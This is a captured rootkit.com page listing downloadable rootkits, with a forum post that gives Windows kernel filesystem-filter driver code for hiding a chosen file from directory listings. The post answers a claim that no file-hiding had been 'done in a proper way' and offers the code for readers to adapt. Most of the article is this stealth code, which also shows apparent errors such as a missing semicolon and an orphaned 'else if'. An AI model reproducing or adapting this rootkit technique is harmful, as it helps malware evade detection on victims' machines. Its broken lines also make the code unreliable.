rootkit.com

main menu

home

forums
Show me new threads!

bookmarks

post article

view blogs

vault

you must be level 2 to upload files to your vault

downloads

you must be logged to access downloads

Rootkit Collection

File	Contributer	Link
Hacker Def...	hf	n/a
HE4Hook	admin	n/a
BASIC CLAS...	hoglund	n/a
Vanquish	xshadow	n/a
NT Rootkit	hoglund	n/a
FU	fuzen_op	n/a
WinlogonHi...	JeFFOsZ	n/a
klister	joanna	n/a
Patchfinde...	joanna	n/a
MyNetwork	hoglund	n/a
MTDWin	hoglund	n/a
NTFSHider	hoglund	n/a
VideoCardK...	hoglund	n/a
VICE	fuzen_op	n/a
Klog	Clandestin...	n/a
NtIllusion	Kdm	n/a
AFX Rootki...	TheRealAph...	n/a
SInAR	vulndev	n/a
Shadow Wal...	Clandestin...	n/a
BootRootki...	dereksoede...	n/a
CHAZ - Nim...	neocrackr	n/a
Clandestin...	merlvingia...	n/a
FUTo	petersilbe...	n/a
Windows Me...	alcapone66...	n/a
RAIDE	petersilbe...	n/a
BOOT KIT	vipinkumar	n/a
BluePill	Joanna and...	n/a
DEFRAG	blume1975	n/a
Keyboard H...	chpie	n/a
CheatEngin...	DarkByte	n/a

backends
A news back-end to implement RootKit news into your website is here or more advanced version here.

An XML/RSS feed that includes both NEWS and BLOGS for RootKit is here: XML/RSS.

Beta feed for replied posts here. feedback to admins not forums, we know about times being off...

ROOTKIT
Because the OS isn't enough!

Saturday July 31st

Featured Article: Nostalgia: n00bk1t, an advanced ring3 rootkit in C by jeffosz

Proper way to hide files/directories aka the FsFilter way aka bypass Flister

By: valerino

Heya, this is my answer to Flister..... Since Joanna said she haven't seen any "file hiding" done in a proper way, here's my code as
requested.

It's just a snippet, so you have of course to readapt it to your needs. It needs an fs filter catching IRP_MJ_DIRECTORY_CONTROL.

cowabunga,
valerio

NTSTATUS UtilSetEventCompletionRoutine( PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context) {

KeSetEvent((PKEVENT) Context, IO_NO_INCREMENT, FALSE); return STATUS_MORE_PROCESSING_REQUIRED; } NTSTATUS FsDirectoryControlDispatch (PIRP Irp) { NTSTATUS Status KEVENT Event; FILE_INFORMATION_CLASS FileInfo; PVOID Buffer; PWCHAR Name; ULONG NameLength; ULONG NameOffset; PFILE_OBJECT FileObject; ULONG resendcount = 0; // hack needed for norton lame filter compatibility PIO_STACK_LOCATION IrpSp = IoGetCurrentIrpStackLocation (Irp); // init event KeInitializeEvent(&Event, NotificationEvent, FALSE); if (IrpSp->MinorFunction != IRP_MN_QUERY_DIRECTORY) { // skip every other minor irp IoSkipCurrentIrpStackLocation(Irp); return IoCallDriver(DeviceExtension->AttachedDevice, Irp); } __resend : // call lower driver and wait IrpSp->Flags |= SL_RETURN_SINGLE_ENTRY; IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine(Irp, UtilSetEventCompletionRoutine, &Event, TRUE, TRUE, TRUE); KeClearEvent(&Event); Status = IoCallDriver(DeviceExtension->AttachedDevice, Irp); if (Status == STATUS_PENDING) { KeWaitForSingleObject(&Event, Executive, KernelMode, FALSE, NULL); Status = Irp->IoStatus.Status; } if (Status != STATUS_SUCCESS) { goto __exit; } // check buffer, in case mask the entry by skipping this entry index IrpSp = IoGetCurrentIrpStackLocation(Irp); // this is the currently examined directory fileobject FileObject = IrpSp->FileObject; FileInfo = IrpSp->Parameters.QueryDirectory.FileInformationClass; Buffer = Irp->UserBuffer; if (!Buffer) { goto __exit; } // get filename for every case switch (FileInfo) { case FileFullDirectoryInformation: NameOffset = FIELD_OFFSET(FILE_FULL_DIR_INFORMATION, FileName[0]); NameLength = ((PFILE_FULL_DIR_INFORMATION) Buffer)->FileNameLength; Name = (PWCHAR) ((ULONG) Buffer + NameOffset); break; case FileDirectoryInformation: NameOffset = FIELD_OFFSET(FILE_DIRECTORY_INFORMATION, FileName[0]); NameLength = ((PFILE_DIRECTORY_INFORMATION) Buffer)->FileNameLength; Name = (PWCHAR) ((ULONG) Buffer + NameOffset); break; case FileNamesInformation: NameOffset = FIELD_OFFSET(FILE_NAMES_INFORMATION, FileName[0]); NameLength = ((PFILE_NAMES_INFORMATION) Buffer)->FileNameLength; Name = (PWCHAR) ((ULONG) Buffer + NameOffset); break; case FileBothDirectoryInformation: NameOffset = FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileName[0]); NameLength = ((PFILE_BOTH_DIR_INFORMATION) Buffer)->FileNameLength; Name = (PWCHAR) ((ULONG) Buffer + NameOffset); break; } // hide file else if (NameLength == wcslen (FILE_TO_HIDE) * sizeof (WCHAR)) { if (Utilwcsstrsize(Name,FILE_TO_HIDE,(USHORT)NameLength, wcslen (FILE_TO_HIDE) * sizeof (WCHAR),FALSE)) { // this is an extra check, which involves you save at initialization time the fileobject of the directory in which // the hidden file resides. Comparing directories FsContexts (FsContext are unique for the same object), // you can be sure that you're hiding the right target file. Without this check, it would hide // \windows\system32\drivers\FILE_TO_HIDE, \windows\FILE_TO_HIDE, \bla\FILE_TO_HIDE, etc.... if (TargetDirFileObject) { if (FileObject->FsContext == TargetDirFileObject->FsContext) { resendcount++; if (resendcount > 1) // compatibility hack for norton filter { goto __exit; } goto __resend; } } } } __exit: // complete the irp and return Status = Irp->IoStatus.Status; IoCompleteRequest(Irp, IO_NO_INCREMENT); return Status; }

read comments (12) / write comment

recent comments:
No guarantee for FileInfo value bluesky 15.Feb:05:50
nice razvanu 02.Feb:09:52

views: 5431 printer-friendly version

ROOTKITS, Subverting the Windows Kernel
By: Greg Hoglund and Jamie Butler

Rootkits are powerful tools to compromise computer systems without detection. Get the original and best book on the subject here.

logged users

active for last 5 minutes

registered users:79912

There are currently 0 registered users and 26 guests browsing the website.

Welcome our latest registered user: Pris

recent board posts
subject author date
Hiding Tcp... _MAX_ Jul / 27
unload dri... dubteam2000 Jul / 26
APC Delive... aall87 Jul / 21
x64 SSDT h... lolwurst Jul / 21
password r... markedu9 Jul / 19
How to hid... Hack4freedom Jul / 15
UNC PATH A... pain_abator Jul / 15
CALL in na... _MAX_ Jul / 13
Conflict b... _MAX_ Jul / 08
Making dev... blackd0t Jul / 06
Hide proce... l0ngshot Jul / 01
Process Ha... krzys Jul / 01
Rooting VP... simplicityx Jun / 24
Rootkits: ... chimai Jun / 24
NDIS Inter... lclee_vx Jun / 17

recently replied posts
subject author date
x64 SSDT h... vrtulex Jul/27
unload dri... EreTIk Jul/27
Hiding Tcp... _MAX_ Jul/27
BIOS Rootk... rossettoecioccolato Jul/25
about this... DiabloNova Jul/22
APC Delive... aall87 Jul/21
password r... markedu9 Jul/19
UNC PATH A... pain_abator Jul/19
How to hid... vrtulex Jul/16
CALL in na... _MAX_ Jul/16
Hide proce... vrtulex Jul/10
Conflict b... _MAX_ Jul/08
Making dev... blackd0t Jul/07

recent blog entries
DiabloNova Jul 31, 12:06
ghost1369 May 09, 04:30
DiabloNova May 08, 15:33
_4epen May 04, 15:42
DiabloNova May 02, 03:59

Best Screenshots / Analog
May 14, 2010
dep.png /
click on the picture to enlarge and see description
!
read comments (0)
write comment
view archive(90) :
Analog(53) / Best Screenshots(37)
submit a picture to gallery

the most active news users
based on the number of news posts for last 30 days

user nr. of posted news

select skin

Beware of Programmers who carry screwdrivers. -- Leonard Brandwein